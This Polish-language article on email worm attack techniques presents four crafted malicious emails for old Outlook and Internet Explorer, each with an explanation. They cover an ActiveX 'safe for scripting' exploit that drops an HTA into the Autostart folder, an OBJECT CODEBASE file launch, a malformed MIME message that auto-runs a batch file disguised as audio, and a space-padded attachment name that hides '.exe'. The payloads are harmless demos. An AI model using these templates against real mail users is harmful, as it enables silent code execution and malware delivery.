Techniki ataków robaków pocztowych.doc

//      Autor nie ponosi odpowiedzialności za wykorzystanie wiedzy zdobytej po przeczytaiu tego arta
//            bugi znaleziono dzięki www.google.pl
//                  pzdr mynio


Techniki ataków robaków pocztowych. Praktyka


Przykład 1  Atak typu bezpieczne do wykonywania skryptów:

From: "Napastnik" <napastnik@niebezpieczny.com>
To: "Ofiara" <ofiara@podatna.com>
Subject: Musisz koniecznie to przeczytać
MIME-Version: 1.0 Content-Type: text/html; charset="ISO-8859-2"
Content-Transfer-Encoding: 7bit Jeśli podczas odczytu tej wiadomości pojawił się błąd, to proszę ją skasować.

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"&g  t; </object> <script> scr.Reset();
scr.Path=?C:\\Windows\\Menu Start\\Programy\\Autostart\\guninski.hta?; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'&g  t;</object><SCRIPT>alert('Written by Georgi Guninski'); wsh.Run('c:\\command.com');</"+"SCRIPT>  ;"; scr.write(); </SCRIPT> </object>

Atak przedstawiony w przykładzie nr 1 opiera się na podatności kontrolek ActiveX oznaczonych jako bezpieczne do wykonywania skryptów. Po ustawieniu w kontrolce ActiveX flagi bezpieczne do wykonywania skryptów, napastnik może całkowicie pomijać sprawdzanie sygnatury przez mechanizm Authenticode, co powoduje, że system nie daje żadnego ostrzeżenia ofierze przed uruchomieniem kodu kontrolki. Daje to napastnikowi możliwość wykonywania dowolnych działań w systemie użytkownika. Przykład nr 1 opiera swoje działanie na wykorzystaniu kontrolki ActiveX Scriptlet.Typelib, która jest właśnie oznaczona jako bezpieczna do wykonywania skryptów. Atak przebiega w dwóch etapach. W pierwszej fazie tworzony jest wykonywalny plik tekstowy z rozszerzeniem .HTA katalogu systemowym Autostart na dysku lokalnym użytkownika. Po stworzeniu pliku zostaje do niego zapisany skrypt. Tworzenie samego pliku przebiega bez powiadamiania użytkownika, który właśnie przegląda wiadomość zawierającą ten złośliwy kod. Od użytkownika nie są wymagane żadne dodatkowe działania w celu ukończenia tego etapu ataku. Druga część ataku przebiega po ponownym uruchomieniu systemu (dla nie wzbudzania podejrzeń kod nie wykonuje restartu systemu ofiary). Plik .HTA zawierający złośliwy skrypt jest interpretowany podczas uruchamiania systemu (ponieważ znajduje się w katalogu startowym systemu a poza tym pliki z .hta są interpretowane przez powłokę systemową bez pytania o zgodę użytkownika). Atak kończy się wyświetleniem wiadomości powitalnej, która jest nieszkodliwa dla systemu. Jednak możliwe jest przygotowanie przez napastnika takiego skryptu, który mógłby wyrządzić poważne szkody i spustoszenia w systemie np. skasować wybrane pliki.

Przykład 2  Uruchamianie plików z wykorzystaniem niezerowego parametru CLSID kontrolki ActiveX (Executing Files Using NonZero ActiveX CLSID Parameter):

From: "Napastnik" <napastnik@niebezpieczny.com>
To: "Ofiara" <ofiara@podatna.com> Subject: Musisz koniecznie to przeczytać
MIME-Version: 1.0 Content-Type: text/html; charset="ISO-8859-2" Jeśli podczas odczytu tej wiadomości pojawił się błąd, to proszę ją skasować.

<html> <head> </head> <body> <object classid=?clsid:10000000-0000-0000-0000-000000000000? CODEBASE=?C:\Windows\calc.exe?></object> </body></html>

W przykładzie nr 2 zastosowano znacznik języka HTML <OBJECT>, w którym została ustawiona niezerowa wartość parametru CLSID. Zabieg ten umożliwia uruchamianie dowolnych plików w systemie bez powiadamiania ofiary. Wskazanie pliku do wykonania w systemie ofiary następuje poprzez ustawienie wartości parametru CODEBASE określającej pełną ścieżkę dostępu do pliku. Atak ten jest nieszkodliwy sam w sobie gdyż ogranicza się tylko do uruchamiania lokalnych programów użytkownika. Jeżeli stanie się on częścią bardziej złożonego ataku może prowadzić do uruchamiania kodu napastnika w systemie ofiary.

Przykład 3  MIME Execution:

From: "Napastnik" <napastnik@niebezpieczny.com>
To: "Ofiara" <ofiara@podatna.com>
Subject: Musisz koniecznie to przeczytać
MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="_1_" X-Priority: 3 X-MSMail-Priority: High --_1_
Content-Type: multipart/alternative; boundary="_2_"

--_2_--
Content-Type: text/html; charset="ISO-8859-2"
Content-Transfer-Encoding: quoted-printable

<html> <head> </head> <body bgColor=3D#ffffff> <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>

Jeśli jesteś zabezpieczony to zostaniesz zapytany o ściągnięcie pliku i wtedy możesz odmówić <br> Jeśli nie jesteś zabezpieczony to zostanie wykonany pewien kod<br> </body></html>
--_2_--

--_1_--
Content-Type: audio/x-wav; name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID> echo OFF dir C:\ echo Twój system jest podatny !!! pause .
--_1_--

Przykład nr 3 prezentuje atak z wykorzystaniem wiadomości pocztowej, która została stworzona niezgodnie ze standardem MIME. Zinterpretowanie w podatnym kliencie poczty wiadomości zawierającej niezgodnie ze standardem MIME ustawione nagłówki powoduje, że pliki wykonywalne są uruchamiane w systemie bez powiadamiania ofiary. W tym przykładzie wiadomość zawiera załącznik hello.bat, który dzięki błędnie ustalonemu nagłówkowi Content-Type jest traktowany przez klienta poczty jak plik dźwiękowy. Dzieje się tak, dlatego gdyż klient pocztowy podczas interpretowania wiadomości rozpoznaje typ danych w załączniku tylko poprzez odczytanie wartości pola Content-Type nie sprawdzając zgodności typu danych z tymi, jakie są rzeczywiście zachowane w załączniku. Samo uruchomienie załącznika zawierającego prosty niegroźny plik wsadowy odbywa się poprzez wykorzystanie znacznika IFRAME.
Tak skonstruowany atak jest bardzo niebezpieczny gdyż oprogramowanie pocztowe odbierającej taką wiadomość ofiary może uruchomić załącznik zawierający złośliwy kod bez ostrzeżenia.

Przykład 4  Ukrywanie rozszerzenia załącznika w wiadomości przez uzupełnianie spacjami:

From: "Napastnik" <napastnik@niebezpieczny.com>
To: "Ofiara" <ofiara@podatna.com>
Subject: Musisz koniecznie to przeczytać
MIME-Version: 1.0 Content-Type: audio/x-wav; name="piosenka.wav [około 150 spacji] .exe? V3pSY1VGcFlOVFFvVUY0cE4wTkQNCi4N... .

W przykładzie nr 4 przygotowana wiadomość zawiera załącznik, który jest wykonywalnym kodem binarnym (plik z rozszerzeniem.exe). Pole Content-Type ma ustawioną wartość, która sprawia, że klient pocztowy odbiorcy tej wiadomości potraktuje załącznik jak plik dźwiękowy. Nadanie załącznikowi nazwy, która składa się z dowolnego łańcucha tekstowego uzupełnionego około 150 znakami spacji sprawia, że taka nazwa załącznika nie jest wyświetlana w całości w kliencie pocztowym. Oprogramowanie wyświetla tylko nazwę pliku z pominięciem rozszerzenia, co umożliwia przekonanie odbiorcy, że zawartość załącznika to plik dźwiękowy piosenka.wav, gdy rzeczywistym rozszerzeniem pliku jest exe. Przekonana ofiara o tym, że w załączniku jest plik dźwiękowy, najczęściej uruchamia załącznik, co powoduje wykonanie zawartego w nim kodu (najczęściej złośliwego) zamiast spodziewanego uruchomienia odtwarzacza plików dźwiękowych. Atak ten wykorzystuje podatność użytkownika na manipulację i może zostać wykorzystany w połączeniu z innymi atakami pocztowymi w celu podniesienia ich efektywności działania.

Początek formularza

Dół formularza